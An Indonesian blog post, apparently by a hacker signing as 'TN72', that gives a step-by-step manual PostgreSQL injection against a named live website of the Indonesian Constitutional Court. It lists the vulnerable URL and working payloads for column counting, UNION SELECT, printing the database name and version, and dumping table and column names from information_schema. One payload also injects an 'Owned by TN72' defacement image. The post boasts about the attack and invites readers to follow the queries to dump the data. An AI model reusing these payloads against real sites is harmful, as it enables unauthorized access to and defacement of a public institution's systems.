POSTGRE-SQL INJECTION VIA ANDROID

error_reporting(0); 


Assalamualaikum warahmatullahi wabarakatuh 😊
Say Hello GT72 LoverS😍
Kali ini gue mau sharing sedikit tentang Injection  di Type PostGreSQL yang dipakai pada website :
MAHKAMAH KONSTITUSI REPUBLIK INDONESIA 😁

Manual pastinya, menggunakan AKAL pemberian TUHAN Y.M.E. (Anti tools tools club xD) πŸ˜„

Pasti dah gak asing lagi yaa dengan SQL INJECTION, kalo belum tau bisa baca disini .

Oke, sekarang kita coba meginjeksi ke website target, cuuuuuusss gan GPL :
https://mkri.id/index.php?page=web.StrukturOrganisasi&id=4



Nah, untuk mengetahui web itu vuln atau tidak terhadap sql, kita coba kasih tanda ( ' ) atau tanda lainnya yang ada disini setelah angka, seperti ini :
https://mkri.id/index.php?page=web.StrukturOrganisasi&id=4'

Jika vuln akan menampilkan pesan kurang lebih seperti ini :
You have an error in your SQL syntax; check the mnual that corresponds to your MySQL. server version for the right syntax to use near " order by id desc' at line 1 "

Atau bisa juga, seperti gambar error, atau seperti tulisan pada gambar dibawah ini, dan masih banyak lagi :D



Oke, jika seperti itu kita lanjut menginjeksi dengan perintah order by sampai ketemu error yaa ..
cek dibawah :

https://mkri.id/index.php?page=web.StrukturOrganisasi&id=4+order+by+1+--+- (no error)
https://mkri.id/index.php?page=web.StrukturOrganisasi&id=4%20order%20by%2013%20--%20- (no error)
https://mkri.id/index.php?page=web.StrukturOrganisasi&id=4 order by 3 -- - (no error)
https://mkri.id/index.php?page=web.StrukturOrganisasi&id=4%20order%20by%2013%20--%20- (error)
* %20, spasi, sama + sama ya gays hehee 

Lebih jelasnya cek gambar dibawah gays 😁

Oke, kita sudah tau yaa ada berapa jumlah kolom yang tersedia pada website tersebut .
Kitaa coba cari angka dimana database ini diletakkan dengan menggunakan UNION SELECT 😁

https://mkri.id/index.php?page=web.StrukturOrganisasi&id=4 union select 1,2,3,4,5,6,7,8,9,10,11,12 -- -

lebih jelasnya cek gambar dibawah :*



Laaaah ko tetep error? SANTUY gan, TUHAN BERSAMA ORANG YANG SANTUY, kataa Para SIBERMEN, hahaha ..

Sekarang kita coba ganti angka tadi dengan null, seperti ini 😁
https://mkri.id/index.php?page=web.StrukturOrganisasi&id=4 union select null,null,null,null,null,null,null,null,null,null,null,null -- -



Yeeeeeaaah, sukses .
Tapi, dimana letak nomornya? SANTUY Lagi Sibermen, hehee
Jika seperti ini, perlu MOOD, karna kita harus nebak diantara NULL tadi πŸ˜‚

Dan gue menemukan di NULL keduaa πŸ˜„
Dan gue coba untuk mencetak L33TNAME, DATABASE, and VERSION 😁
And this is My Query :
https://mkri.id/index.php?page=web.StrukturOrganisasi&id=4 union select+null,concat(%27Owned%20by%20TN72%27,%27%3Cbr%3E%27,%27%3Cbr%3E%27,%27Database%20::%27,current_database(),%27%3Cbr%3E%27,%27Version%20::%20%27,version()),null,null,null,null,null,null,null,null,null,null--+-#



Daaaaaaan, TARAAAAAAAAAA,
SUKSES TERCETAK 😁

Yuuu kita INTIP sedikit Tabel yang adaaa πŸ˜„

Dari Query diatas tadi kita tambah dengan Query seperti dibawah ini :
Concat(%27%3Cimg%20src=https://i.ibb.co/4Vt2SWQ/20190506-051600.png%3E%27,%27Owned%20by%20TN72%27,%27%3Cbr%3E%27,current_database(),%27%3Cbr%3E%27,version(),%27%3Cbr%3E%27,(select+string_agg(concat(table_name,%27::%27,column_name),$$%3Cli%3E$$)from+information_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$)))

Kamu lihat? Gambar Garuda berwarna merah dan tulisan OWNED BY TN72 πŸ˜„




Duuuuuummmmnnnn πŸ˜„

Untuk Dump nya liat dan ikutin query saja yaaa 😁
Copas TANPA SUMBER? FIX LO AMPAS πŸ™‚
Titip nick yaaak TN72 dan Garuda Tersakti 72 😘

Report on Instagram, 9 Agustus 11.54 PM (No Response)
https://www.instagram.com/mahkamahkonstitusi/

Sekian yang bisa gue sharing kali ini, bukan bermaksud untuk menggurui rekan rekan sekalianπŸ˜‚
Keep Learn, Like, And Share~

Thanks for reading 😝

Related Posts:


0 Response to "POSTGRE-SQL INJECTION VIA ANDROID"

Post a Comment